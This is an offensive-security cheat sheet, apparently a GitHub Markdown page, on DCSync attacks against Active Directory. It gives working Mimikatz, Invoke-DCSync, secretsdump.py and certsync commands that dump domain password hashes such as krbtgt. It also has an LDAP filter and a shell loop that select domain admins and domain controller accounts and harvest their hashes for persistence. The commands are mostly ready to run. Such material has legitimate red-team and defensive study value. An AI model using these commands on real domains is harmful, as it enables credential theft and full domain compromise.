description
DS-Replication-Get-Changes + DS-Replication-Get-Changes-All

DCSync

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync
https://habr.com/ru/company/rvision/blog/709866/
https://habr.com/ru/company/rvision/blog/709942/
https://nullg0re.com/2023/09/hijacking-someone-else-dcsync/

{% embed url="https://twitter.com/cnotin/status/1419944965443047424" %}

{% embed url="https://twitter.com/NotMedic/status/1535768397493026818" %}

Tools

Mimikatz

mimikatz # lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt
mimikatz # lsadump::dcsync /domain:megacorp.local /user:krbtgt@megacorp.local

Invoke-Mimikatz

https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1

PS > Invoke-Mimikatz -Command '"lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt" "exit"'

Invoke-DCSync.ps1

https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1

PS > Invoke-DCSync -GetComputers -Domain megacorp.local -DomainController DC1.megacorp.local

DCSyncer

https://www.notsoshant.io/tools/dcsyncer/
https://github.com/notsoshant/DCSyncer

secretsdump.py

$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
$ secretsdump.py DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Targeted DCSync

When performing targeted DCSync (e. g., for persistence purposes) choose the most valuable accounts. One can use the following LDAP query to search for effective domain admins (adminCount=1) as well as DC computer accounts (SERVER_TRUST_ACCOUNT bit or userAccountControl=8192 is set):

(&
	(|
		(&(objectCategory=person)(objectClass=user))
		(&(objectCategory=computer)(objectClass=computer))
	)
	(!(userAccountControl:1.2.840.113556.1.4.803:=2))
	(|
		(adminCount=1)
		(userAccountControl:1.2.840.113556.1.4.803:=8192)
	)
)

$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'DC1$' --hash fc525c9683e8fe067095ba2ddc971889 -m custom --filter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' --attrs msDS-PrincipalName | grep msDS | awk '{print $2}' | tee high-value-targets.txt
$ for t in `cat high-value-targets.txt`; do secretsdump.py -pwd-last-set MEGACORP/'DC1$'@192.168.2.22 -hashes :fc525c9683e8fe067095ba2ddc971889 -just-dc-user $t | grep aad3b | tee -a high-value-hashes.txt; done
Or
$ secretsdump.py -pwd-last-set MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -ldapfilter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' | grep aad3b | tee high-value-hashes.txt

certsync

https://github.com/zblurx/certsync

$ certsync -d megacorp.local -u snovvcrash -p 'Passw0rd!' -dc-ip 192.168.1.11 -ns 192.168.1.11

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

dcsync.md

dcsync.md

DCSync

Tools

Mimikatz

Invoke-Mimikatz

Invoke-DCSync.ps1

DCSyncer

secretsdump.py

Targeted DCSync

certsync

Files

dcsync.md

Latest commit

History

dcsync.md

File metadata and controls

DCSync

Tools

Mimikatz

Invoke-Mimikatz

Invoke-DCSync.ps1

DCSyncer

secretsdump.py

Targeted DCSync

certsync